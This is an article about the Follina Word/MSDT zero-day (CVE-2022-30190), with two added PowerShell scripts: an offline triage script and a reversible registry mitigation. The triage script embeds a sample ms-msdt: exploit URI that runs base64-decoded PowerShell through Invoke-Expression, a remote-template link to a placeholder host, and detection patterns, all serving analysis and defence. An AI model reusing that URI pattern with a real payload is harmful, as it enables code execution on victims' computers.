This code exploits a flaw called Follina. It is classified as a zero-day, meaning attackers were already exploiting it before any patch existed (Microsoft had "zero days" to release a fix). The research group nao_sec stumbled on the suspicious code by accident while searching for documents that exploit another flaw: an Internet user based in Belarus had submitted a suspicious document to VirusTotal, the site that checks whether a file is detected by various antivirus engines.
Code hidden in base64
The document uses Word's remote template feature to load an HTML file from a remote server. The author of the code used a familiar technique to hide the problematic commands: they are base64-encoded and only decoded at runtime. The HTML then redirects the machine to the Microsoft Support Diagnostic Tool (MSDT), through its ms-msdt: URI scheme, to download a file and execute PowerShell commands. This works even if macros are disabled.
Since the second file is no longer available, researchers do not know the author's exact purpose. But once an attacker can run arbitrary PowerShell commands, they can potentially take full control of the computer and use it to attack other machines.
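The two artefacts the chain above leaves behind, a remote-template relationship inside the .docx and an HTML page that hands an ms-msdt: URI with a base64 blob to the shell, can be triaged offline. The script below is an added example, not code from the original article or from nao_sec; both the .rels XML and the HTML are constructed samples embedded in the script (placeholder host name, and a base64 blob that decodes to a harmless Write-Output rather than a real payload).

```powershell
# Added example, not code from the original article: offline triage of the two artefacts
# described above, run against constructed sample data embedded in this script.

# Constructed sample of word/_rels/settings.xml.rels from a .docx that uses the remote
# template feature. The host name is a placeholder.
$SettingsRels = @'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://template.example.invalid/loader.html" TargetMode="External"/>
</Relationships>
'@

# Constructed stand-in for the remote HTML file. The base64 blob decodes to a harmless
# Write-Output so the script is safe to run; a real sample carries the attacker's command.
$SampleCommand = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("Write-Output 'constructed payload'"))
$RemoteHtml = @"
<!doctype html><html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=`$(Invoke-Expression([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('$SampleCommand'))))\"";
</script></body></html>
"@

function Get-RemoteTemplateTarget {
    # Flag attachedTemplate relationships whose target lies outside the document package.
    param([Parameter(Mandatory)][string]$RelsXml)
    $xml = [xml]$RelsXml
    $ns  = New-Object System.Xml.XmlNamespaceManager($xml.NameTable)
    $ns.AddNamespace('r', 'http://schemas.openxmlformats.org/package/2006/relationships')
    foreach ($rel in $xml.SelectNodes('//r:Relationship', $ns)) {
        if ($rel.Type -like '*/attachedTemplate' -and $rel.TargetMode -eq 'External') {
            [pscustomobject]@{ Id = $rel.Id; Target = $rel.Target }
        }
    }
}

function Get-MsdtPayload {
    # Pull every ms-msdt: URI out of the HTML, then decode any base64 token found inside it.
    param([Parameter(Mandatory)][string]$Html)
    foreach ($m in [regex]::Matches($Html, 'ms-msdt:[^\r\n]+')) {
        $uri = $m.Value.TrimEnd('";')
        $decoded = foreach ($b in [regex]::Matches($uri, '[A-Za-z0-9+/]{20,}={0,2}')) {
            # Tokens that are not valid base64 raise FormatException and are skipped.
            try { [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b.Value)) } catch { }
        }
        [pscustomobject]@{
            Uri            = $uri
            RunsPowerShell = [bool]($uri -match 'Invoke-Expression|IEX|powershell')
            Decoded        = @($decoded)
        }
    }
}

Get-RemoteTemplateTarget -RelsXml $SettingsRels | Format-List
Get-MsdtPayload -Html $RemoteHtml | Format-List
```

On a real sample, feed Get-RemoteTemplateTarget the settings.xml.rels extracted from the .docx (it is a plain zip) and Get-MsdtPayload the HTML the template URL served; an external attachedTemplate target together with an ms-msdt: URI carrying a base64 blob is the combination described above.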
Follina is particularly problematic. By default, Word opens .docx files in Protected View, and the code only runs once the user clicks "Enable Editing". If the document is in .rtf format, however, that protection does not apply: merely selecting the file in File Explorer (with the preview pane enabled) is enough to trigger the code, without ever opening it.
An overview of how Follina works on a fully updated Office 2021. © Didier Stevens
In April, Microsoft had already rejected a report
The code works on all versions of Office released since at least 2013, with all updates applied, including Office 2021. There are indications that the problem was reported earlier. In April, the Shadow Chaser Group, a student security research group, submitted a sample to the Microsoft Security Response Center (MSRC). An MSRC engineer replied that it was not a security issue, since the submitted sample did not work on his computer. Microsoft has since changed its mind: on May 30 the company registered the bug under reference CVE-2022-30190.
For now, there is no simple way to protect yourself from this attack. Pending an update, the most common workaround is to edit the registry so that the diagnostic tool can no longer be launched from Word. To do this, create a DWORD value named EnableDiagnostics under HKLM\Software\Policies\Microsoft\Windows\ScriptedDiagnostics and set it to 0.
But beware: this workaround is for advanced users only. A mistake while editing the registry can crash the system or prevent the computer from starting, so back up the key before changing anything.
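The registry change above can be applied in a way that is reversible, which removes most of the risk the warning refers to. The script below is an added example, not Microsoft's guidance or code from the original article; it records the current state of the key to a JSON file (path and file name are this example's own choice), sets EnableDiagnostics to 0 under the ScriptedDiagnostics policy key, reads the value back, and provides a function to undo the change exactly. It must run from an elevated PowerShell session.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original article: apply the ScriptedDiagnostics mitigation
# described above with a recorded backup so it can be rolled back once a patch is installed.

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics'
$ValueName = 'EnableDiagnostics'
# Backup location chosen for this example; any writable path works.
$Backup    = Join-Path $env:ProgramData 'ScriptedDiagnostics-backup.json'

function Disable-ScriptedDiagnostics {
    # Record whether the key and value existed, and the old value, before touching anything.
    $keyExisted = Test-Path $PolicyKey
    $previous   = $null
    if ($keyExisted) {
        $previous = (Get-ItemProperty -Path $PolicyKey -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
    }
    @{ KeyExisted = $keyExisted; PreviousValue = $previous } |
        ConvertTo-Json | Set-Content -Path $Backup -Encoding UTF8

    # Create the policy key if it is missing, then set the DWORD to 0 (diagnostics disabled).
    if (-not $keyExisted) { New-Item -Path $PolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $PolicyKey -Name $ValueName -Value 0 -Type DWord

    # Read it back: anything other than 0 means the mitigation is not in place.
    (Get-ItemProperty -Path $PolicyKey -Name $ValueName).$ValueName
}

function Restore-ScriptedDiagnostics {
    # Put the key back exactly as the backup recorded it.
    if (-not (Test-Path $Backup)) { throw "No backup at $Backup; nothing to restore." }
    $state = Get-Content -Path $Backup -Raw | ConvertFrom-Json
    if (-not $state.KeyExisted) {
        Remove-Item -Path $PolicyKey -Recurse -Force -ErrorAction SilentlyContinue
    } elseif ($null -eq $state.PreviousValue) {
        Remove-ItemProperty -Path $PolicyKey -Name $ValueName -ErrorAction SilentlyContinue
    } else {
        Set-ItemProperty -Path $PolicyKey -Name $ValueName -Value $state.PreviousValue -Type DWord
    }
}

$result = Disable-ScriptedDiagnostics
"EnableDiagnostics is now $result (0 = disabled); backup written to $Backup"
```

The key sits under the Policies hive, so on a domain-joined machine a Group Policy refresh will rewrite whatever is set here; in that case apply the same setting through the GPO rather than locally. Run Restore-ScriptedDiagnostics after the patch is installed to return the machine to its previous state.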